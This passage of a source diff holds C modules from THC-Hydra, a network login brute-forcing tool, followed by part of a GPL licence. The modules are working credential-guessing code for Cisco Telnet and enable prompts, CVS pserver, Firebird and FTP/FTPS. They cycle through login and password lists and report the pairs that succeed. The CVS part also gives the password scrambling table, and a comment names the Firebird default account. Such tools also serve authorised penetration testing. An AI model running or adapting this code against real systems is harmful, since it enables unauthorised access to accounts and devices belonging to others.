if (buf != NULL && strstr(buf, "assw") != NULL) {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "%.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (strstr(buf, "assw") != NULL) {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "%.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
}
}
if (buf != NULL
&& (strstr(buf, "assw") != NULL || strstr(buf, "ad ") != NULL || strstr(buf, "attempt") != NULL || strstr(buf, "fail") != NULL || strstr(buf, "denied") != NULL)) {
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
if (buf != NULL)
free(buf);
hydra_report_found_host(port, ip, "cisco-enable", fp);
hydra_completed_pair_found();
return 3;
}
void service_cisco_enable(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, failc = 0, retry = 1, next_run = 1, sock = -1;
int myport = PORT_TELNET, mysslport = PORT_TELNET_SSL;
char buffer[300];
char *login;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* Cisco AAA Support */
if (strlen(login = hydra_get_next_login()) != 0) {
while ((buf = hydra_receive_line(sock)) != NULL && strstr(buf, "name:") == NULL && strstr(buf, "ogin:") == NULL) {
if (hydra_strcasestr(buf, "ress ENTER") != NULL)
hydra_send(sock, "\r\n", 2, 0);
free(buf);
}
sprintf(buffer, "%.250s\r\n", login);
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send login\n", (int) getpid());
hydra_child_exit(2);
}
}
if (miscptr != NULL) {
while ((buf = hydra_receive_line(sock)) != NULL && strstr(buf, "assw") == NULL) {
if (hydra_strcasestr(buf, "ress ENTER") != NULL)
hydra_send(sock, "\r\n", 2, 0);
free(buf);
}
sprintf(buffer, "%.250s\r\n", miscptr);
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send login\n", (int) getpid());
hydra_child_exit(2);
}
}
buf = hydra_receive_line(sock);
if (hydra_strcasestr(buf, "ress ENTER") != NULL) {
hydra_send(sock, "\r\n", 2, 0);
free(buf);
buf = hydra_receive_line(sock);
}
if (strstr(buf, "assw") != NULL) {
fprintf(stderr, "[ERROR] Child with pid %d terminating - can not login, can not login\n", (int) getpid());
hydra_child_exit(2);
}
free(buf);
next_run = 2;
break;
}
case 2: /* run the cracking function */
{
unsigned char *buf2;
int f = 0;
sprintf(buffer, "%.250s\r\n", "ena");
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send 'ena'\n", (int) getpid());
hydra_child_exit(2);
}
do {
if (f != 0)
free(buf2);
else
f = 1;
if ((buf2 = (unsigned char *) hydra_receive_line(sock)) == NULL) {
if (failc < retry) {
next_run = 1;
failc++;
fprintf(stderr, "[ERROR] Child with pid %d was disconnected - retrying (%d of %d retries)\n", (int) getpid(), failc, retry);
sleep(3);
break;
} else {
fprintf(stderr, "[ERROR] Child with pid %d was disconnected - exiting\n", (int) getpid());
hydra_child_exit(0);
}
}
} while (strstr((char *) buf2, "assw") == NULL);
free(buf2);
if (next_run != 0)
break;
failc = 0;
next_run = start_cisco_enable(sock, ip, port, options, miscptr, fp);
break;
}
case 3: /* clean exit */
sprintf(buffer, "%.250s\r\n", "exit");
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send 'exit'\n", (int) getpid());
hydra_child_exit(0);
}
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
hydra_child_exit(2);
}
run = next_run;
}
}
int service_cisco_enable_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

198
hydra-cisco.c Normal file
View file

@ -0,0 +1,198 @@
#ifdef PALM
#include "palm/hydra-mod.h"
#else
#include "hydra-mod.h"
#endif
extern char *HYDRA_EXIT;
char *buf;
int start_cisco(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass, buffer[300];
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
#ifdef PALM
sprintf(buffer, "%s\r\n", pass);
#else
sprintf(buffer, "%.250s\r\n", pass);
#endif
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
sleep(1);
do {
buf = hydra_receive_line(s);
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
} while (strlen(buf) <= 1);
if (strstr(buf, "assw") != NULL) {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
#ifdef PALM
sprintf(buffer, "%s\r\n", pass);
#else
sprintf(buffer, "%.250s\r\n", pass);
#endif
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
do {
buf = hydra_receive_line(s);
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
} while (strlen(buf) <= 1);
if (buf != NULL && strstr(buf, "assw") != NULL) {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
#ifdef PALM
sprintf(buffer, "%s\r\n", pass);
#else
sprintf(buffer, "%.250s\r\n", pass);
#endif
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
do {
buf = hydra_receive_line(s);
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
} while (strlen(buf) <= 1);
}
}
if (buf != NULL && (strstr(buf, "assw") != NULL || strstr(buf, "ad ") != NULL || strstr(buf, "attempt") != NULL || strstr(buf, "ailur") != NULL)) {
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
hydra_report_found_host(port, ip, "cisco", fp);
hydra_completed_pair_found();
if (buf != NULL)
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_cisco(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, failc = 0, retry = 1, next_run = 1, sock = -1;
int myport = PORT_TELNET, mysslport = PORT_TELNET_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
unsigned char *buf2;
int f = 0;
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
if (miscptr != NULL && hydra_strcasestr(miscptr, "enter") != NULL)
hydra_send(sock, "\r\n", 2, 0);
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
do {
if (f != 0)
free(buf2);
else
f = 1;
if ((buf2 = (unsigned char *) hydra_receive_line(sock)) == NULL) {
if (failc < retry) {
next_run = 1;
failc++;
hydra_report(stderr, "[ERROR] Child with pid %d was disconnected - retrying (%d of %d retries)\n", (int) getpid(), failc, retry);
sleep(3);
break;
} else {
hydra_report(stderr, "[ERROR] Child with pid %d was disconnected - exiting\n", (int) getpid());
hydra_child_exit(0);
}
}
if (buf2 != NULL && hydra_strcasestr(buf2, "ress ENTER") != NULL)
hydra_send(sock, "\r\n", 2, 0);
} while (strstr((char *) buf2, "assw") == NULL);
free(buf2);
if (next_run != 0)
break;
failc = 0;
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_cisco(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
#ifdef PALM
return;
#else
hydra_child_exit(2);
#endif
}
run = next_run;
}
}
int service_cisco_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

151
hydra-cvs.c Normal file
View file

@ -0,0 +1,151 @@
#include "hydra-mod.h"
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
char *buf;
int start_cvs(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[1024], pass2[513];
int i;
char *directory = miscptr;
/* evil cvs encryption sheme...
0 111 P 125 p 58
! 120 1 52 A 57 Q 55 a 121 q 113
" 53 2 75 B 83 R 54 b 117 r 32
3 119 C 43 S 66 c 104 s 90
4 49 D 46 T 124 d 101 t 44
% 109 5 34 E 102 U 126 e 100 u 98
& 72 6 82 F 40 V 59 f 69 v 60
' 108 7 81 G 89 W 47 g 73 w 51
( 70 8 95 H 38 X 92 h 99 x 33
) 64 9 65 I 103 Y 71 i 63 y 97
* 76 : 112 J 45 Z 115 j 94 z 62
+ 67 ; 86 K 50 k 93
, 116 < 118 L 42 l 39
- 74 = 110 M 123 m 37
. 68 > 122 N 91 n 61
/ 87 ? 105 O 35 _ 56 o 48
*/
char key[] = { 0, 120, 53, 0, 0, 109, 72, 108, 70, 64, 76, 67, 116, 74, 68, 87,
111, 52, 75, 119, 49, 34, 82, 81, 95, 65, 112, 86, 118, 110, 122, 105,
0, 57, 83, 43, 46, 102, 40, 89, 38, 103, 45, 50, 42, 123, 91, 35,
125, 55, 54, 66, 124, 126, 59, 47, 92, 71, 115, 0, 0, 0, 0, 56,
0, 121, 117, 104, 101, 100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,
58, 113, 32, 90, 44, 98, 60, 51, 33, 97, 62
};
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(pass2, 0, sizeof(pass2));
strncpy(pass2, pass, 512);
for (i = 0; i < strlen(pass); i++) {
pass2[i] = key[pass2[i] - 0x20];
}
snprintf(buffer, sizeof(buffer), "BEGIN VERIFICATION REQUEST\n%s\n%s\nA%s\nEND VERIFICATION REQUEST\n", directory, login, pass2);
i = 57 + strlen(directory) + strlen(login) + strlen(pass2);
if (hydra_send(s, buffer, i - 1, 0) < 0) {
return 1;
}
if (hydra_data_ready_timed(s, 5, 0) > 0) {
buf = hydra_receive_line(s);
if (strstr(buf, "I LOVE YOU\n")) {
hydra_report_found_host(port, ip, "cvs", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
return 3;
}
} else if (strstr(buf, "no such user") || strstr(buf, "E PAM start error: Critical error - immediate abort\n")) {
if (verbose) {
hydra_report(stderr, "[VERBOSE] User %s does not exist\n", login);
}
hydra_completed_pair_skip();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
return 3;
}
}
/* "I HATE YOU\n" case */
free(buf);
return 3;
}
return 3;
}
void service_cvs(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_CVS, mysslport = PORT_CVS_SSL;
hydra_register_socket(sp);
if ((miscptr == NULL) || (strlen(miscptr) == 0)) {
miscptr = "/root";
}
while (1) {
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = start_cvs(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_cvs_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

160
hydra-firebird.c Normal file
View file

@ -0,0 +1,160 @@
/*
Firebird Support - by David Maciejak @ GMAIL dot com
you need to pass full path to the fdb file as argument
default account is SYSDBA/masterkey
on Firebird 2.0, access to the database file directly
is not possible anymore, in verbose mode you will see
the msg: "no permission for direct access to security database"
*/
#include "hydra-mod.h"
#ifndef LIBFIREBIRD
void dummy_firebird() {
printf("\n");
}
#else
#include <stdio.h>
#include <ibase.h>
#define DEFAULT_DB "C:\\Program Files\\Firebird\\Firebird_1_5\\security.fdb"
extern char *HYDRA_EXIT;
int start_firebird(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
char database[256];
char connection_string[1024];
isc_db_handle db; /* database handle */
ISC_STATUS_ARRAY status; /* status vector */
char *dpb = NULL; /* DB parameter buffer */
short dpb_length = 0;
if (miscptr)
strncpy(database, miscptr, sizeof(database));
else
strncpy(database, DEFAULT_DB, sizeof(database));
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
dpb_length = (short) (1 + strlen(login) + 2 + strlen(pass) + 2);
if ((dpb = (char *) malloc(dpb_length)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
/* Add user and password to dpb */
*dpb = isc_dpb_version1;
dpb_length = 1;
isc_modify_dpb(&dpb, &dpb_length, isc_dpb_user_name, login, strlen(login));
isc_modify_dpb(&dpb, &dpb_length, isc_dpb_password, pass, strlen(pass));
/* Create connection string */
snprintf(connection_string, sizeof(connection_string), "%s:%s", hydra_address2string(ip), database);
if (isc_attach_database(status, 0, connection_string, &db, dpb_length, dpb)) {
/* for debugging perpose */
if (verbose) {
hydra_report(stderr, "[VERBOSE] ");
isc_print_status(status);
}
isc_free(dpb);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
} else {
isc_detach_database(status, &db);
isc_free(dpb);
hydra_report_found_host(port, ip, "firebird", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
return 1;
}
void service_firebird(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_FIREBIRD, mysslport = PORT_FIREBIRD_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
/*
* Here we start the password cracking process
*/
next_run = start_firebird(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_firebird_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

188
hydra-ftp.c Normal file
View file

@ -0,0 +1,188 @@
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
int start_ftp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"";
char *login, *pass, buffer[510];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "USER %.250s\r\n", login);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
/* special hack to identify 530 user unknown msg. suggested by Jean-Baptiste.BEAUFRETON@turbomeca.fr */
if (buf[0] == '5' && buf[1] == '3' && buf[2] == '0') {
hydra_completed_pair_skip();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 4;
free(buf);
return 1;
}
// for servers supporting anon access without password
if (buf[0] == '2') {
hydra_report_found_host(port, ip, "ftp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 4;
free(buf);
return 1;
}
if (buf[0] != '3') {
if (buf) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf);
free(buf);
}
return 3;
}
free(buf);
sprintf(buffer, "PASS %.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
if (buf[0] == '2') {
hydra_report_found_host(port, ip, "ftp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 4;
free(buf);
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 4;
return 2;
}
void service_ftp_core(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, int tls) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_FTP, mysslport = PORT_FTP_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
hydra_child_exit(0);
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
usleep(250);
buf = hydra_receive_line(sock);
if (buf == NULL || buf[0] != '2') { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
if (buf != NULL)
free(buf);
hydra_child_exit(2);
}
while (buf != NULL && strncmp(buf, "220 ", 4) != 0 && strstr(buf, "\n220 ") == NULL) {
free(buf);
buf = hydra_receive_line(sock);
}
free(buf);
//this mode is manually chosen, so if it fails we giving up
if (tls) {
if (hydra_send(sock, "AUTH TLS\r\n", strlen("AUTH TLS\r\n"), 0) < 0) {
hydra_child_exit(2);
}
buf = hydra_receive_line(sock);
if (buf == NULL) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
}
if (buf[0] == '2') {
if ((hydra_connect_to_ssl(sock) == -1) && verbose) {
hydra_report(stderr, "[ERROR] Can't use TLS\n");
hydra_child_exit(2);
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
} else {
hydra_report(stderr, "[ERROR] TLS negotiation failed %s\n", buf);
hydra_child_exit(2);
}
free(buf);
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_ftp(sock, ip, port, options, miscptr, fp);
break;
case 3: /* error exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
case 4: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
void service_ftp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ftp_core(ip, sp, options, miscptr, fp, port, 0);
}
void service_ftps(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ftp_core(ip, sp, options, miscptr, fp, port, 1);
}
int service_ftp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

0
hydra-gtk/AUTHORS Executable file
View file

340
hydra-gtk/COPYING Executable file
View file

@ -0,0 +1,340 @@
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
